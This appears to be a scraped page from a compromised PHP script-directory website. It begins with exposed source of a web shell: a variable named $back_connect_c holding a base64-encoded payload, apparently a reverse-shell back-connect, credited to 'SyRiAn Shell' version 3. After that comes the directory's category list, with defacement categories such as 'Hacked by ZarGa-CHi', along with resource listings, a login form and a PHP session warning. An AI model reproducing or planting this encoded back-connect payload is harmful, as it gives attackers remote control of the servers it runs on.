$back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw=="; #------------------------------------# # Powered By SyRiAn Shell # # By EH SyRiAn 34G13 # # wWw.syrian-shell.com # # Version 3 # # Made In SyRiA # # 6\11\2010 # #------------------------------------# ?>

Color Scheme :

 
  SEARCH  
 
  Keyword
 
  In
 
 
   
 
  CATEGORIES  
 
ASP.NET
By
CFML
CGI and Perl
HACKED
Hacked by ZarGa-CHi
Hacked Tunisia
PHP
Python
Remotely Hosted
Ruby on Rails
security 0 hacker 1
sql enject hacking
sql injection hacking .......ZarGa-CHi
Tools and Utilities
Web Hosting
XML
 
   
 
    SUBSCRIBE
 
Email Address
Subscribe
Unsubscribe
 
   
 
  OUR SPONSORS  
 
 
   
 
  CATEGORIES
Users Online: 2  
 
  ASP.NET   ( 1 )   By   ( 6 )
  CFML   ( 1 )   CGI and Perl   ( 20 )
  HACKED   ( 1 )   Hacked by ZarGa-CHi   ( 20 )
  Hacked Tunisia   ( 0 )   PHP   ( 122 )
  Python   ( 0 )   Remotely Hosted   ( 15 )
  Ruby on Rails   ( 0 )   security 0 hacker 1   ( 0 )
  sql enject hacking   ( 0 )   sql injection hacking .......ZarGa-CHi   ( 1 )
  Tools and Utilities   ( 19 )   Web Hosting   ( 1 )
  XML   ( 0 )
 
   
 
 LATEST FEATURED RESOURCES
  No Listing available in this section
 Resource Name  Platform
 
 
 TOP RATED RESOURCES
 
 Resource Name  Platform
Database Examiner Individual L... Windows 2000 , Windows 2003 , Windows NT , Windows Vista , Windows XP
iScripts EasyBiller -Online Bi... Windows, Linux
iScripts AutoHoster - Web Host... Windows, Linux
freespace4u - free and paid pr... all
LiveCart - Shopping Cart Softw... linux, windows, freebsd, osx, sun
Syndikut - IP Lokkup All
Domain Information Script n.a.
 
 
 
  LOGIN HERE  
 
Username
Password
Forgot Password
Verify Signup
 
 
  SPONSOR  
 
 
   
 

Warning: Unknown(): Your script possibly relies on a session side-effect which existed until PHP 4.2.3. Please be advised that the session extension does not consider global variables as a source of data, unless register_globals is enabled. You can disable this functionality and this warning by setting session.bug_compat_42 or session.bug_compat_warn to off, respectively. in Unknown on line 0